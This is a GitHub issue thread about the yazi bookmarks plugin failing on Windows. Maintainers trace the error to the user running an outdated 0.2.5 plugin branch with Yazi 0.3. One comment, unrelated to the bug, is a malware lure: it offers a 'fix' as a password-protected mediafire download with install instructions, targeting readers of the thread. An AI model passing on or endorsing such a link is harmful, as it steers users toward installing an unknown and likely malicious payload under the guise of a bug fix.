### ISSUE TITLE
`ya.sync` doesn't work 

### ISSUE THREAD

**Issue by Jaehaks** [dedukun/bookmarks.yazi#26]
Thank you for your efforts, 

when I press 'm' and 'a' (or other character) to save current location to 'a' register, 
it doesn't work and get error but I don't know what is the reason. 
![image](https://github.com/user-attachments/assets/c59cf6ed-aa5e-4d60-b6d6-a3704dcafa64)

I set configuration using default config. 

- case1) 
  I erased `save_bookmark(key)` and put `ya.nofity()` check whether the `entry` function works.. It works well to pick action == 'save'. 

- case2) 
  I erased all contents of `save_bookmark()` and put `ya.notify()` in the function 
  But the notify doesn't work. I think it is failed when the `ya.sync` is executed

Is it problem of yazi?

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dedukun** [comment]
Hey,

It's weird that it's not working, what's your Yazi version? Can you add the output of `yazi --debug` here?

Also, there are some logs in `~/.local/state/yazi/yazi.log` ( or `C:\Users\USERNAME\AppData\Roaming\yazi\state\yazi.log` if you are on windows), if you could also trigger the error and put the log here it would be helpful.

**Comment by Jaehaks** [comment]
- Result of `yazi --debug` 
```
Yazi
    Version: 0.3.1 (4112bf4 2024-08-15)
    Debug  : false
    OS     : windows-x86_64 (windows)

Ya
    Version: 0.3.1 (4112bf4 2024-08-15)

Emulator
    Emulator.via_env: ("xterm-256color", "WezTerm")
    Emulator.via_csi: Ok(Unknown([]))
    Emulator.detect : WezTerm

Adapter
    Adapter.matches: Iterm2

Desktop
    XDG_SESSION_TYPE: None
    WAYLAND_DISPLAY : None
    DISPLAY         : None

SSH
    shared.in_ssh_connection: false

WSL
    /proc/sys/fs/binfmt_misc/WSLInterop: false

Variables
    SHELL              : None
    EDITOR             : None
    VISUAL             : None
    YAZI_FILE_ONE      : Some("C:\\Program Files\\Git\\usr\\bin\\file.exe")
    YAZI_CONFIG_HOME   : Some("C:\\Users\\USER\\.config\\Dotfiles\\yazi")

Text Opener
    default: Some(Opener { run: "nvim %*", block: true, orphan: false, desc: "nvim", for_: None, spread: true
})
    block  : Some(Opener { run: "nvim %*", block: true, orphan: false, desc: "nvim", for_: None, spread: true
})

Multiplexers
    TMUX               : false
    tmux version       : program not found
    ZELLIJ_SESSION_NAME: None
    Zellij version     : program not found

Dependencies
    file             : 5.45
    ueberzugpp       : program not found
    ffmpegthumbnailer: program not found
    magick           : 7.1.1-36
    fzf              : 0.53.0
    fd               : 10.1.0
    rg               : 14.1.0
    chafa            : program not found
    zoxide           : 0.9.4
    7z               : 24.07
    7zz              : program not found
    jq               : 1.7.1


--------------------------------------------------
When reporting a bug, please also upload the `yazi.log` log file - only upload the most recent content by time.
You can find it in the "C:\\Users\\USER\\AppData\\Roaming\\yazi\\state" directory.
```

I'm windows user

**Comment by Jaehaks** [comment]
I'm sorry to my mistake. 
`ya.sync` works well.

but Folder:by_kind() got a nil value

- log is 
```
  2024-08-28T12:59:00.093230Z ERROR yazi::lives::lives: runtime error: [string "bookmarks"]:37: attempt to call a nil value (method 'by_kind')
stack traceback:
	[C]: in method 'by_kind'
	[string "bookmarks"]:37: in function <[string "bookmarks"]:36>
	[C]: in upvalue '_get_hovered_file'
	[string "bookmarks"]:114: in function <[string "bookmarks"]:113>
stack traceback:
	[C]: in upvalue '_get_hovered_file'
	[string "bookmarks"]:114: in function <[string "bookmarks"]:113>

    at yazi-fm\src\lives\lives.rs:60
```

**Comment by sxyazi** [comment]
> but Folder:by_kind() got a nil value

Hey, your Yazi version is 0.3, but you are using the [0.2.5 branch of this plugin](https://github.com/dedukun/bookmarks.yazi/tree/yazi-0.2.5). Please upgrade the plugin to the latest main branch.

**Comment by dedukun** [comment]
Yeah, that's it, please use the main branch of the plugin.

I think I'll remove the 0.2.5 branch. It was created before the 0.3 Yazi release, but it's not needed anymore.

**Comment by Jaehaks** [comment]
@sxyazi  @dedukun 
I understand what the problem is. Thanks:)
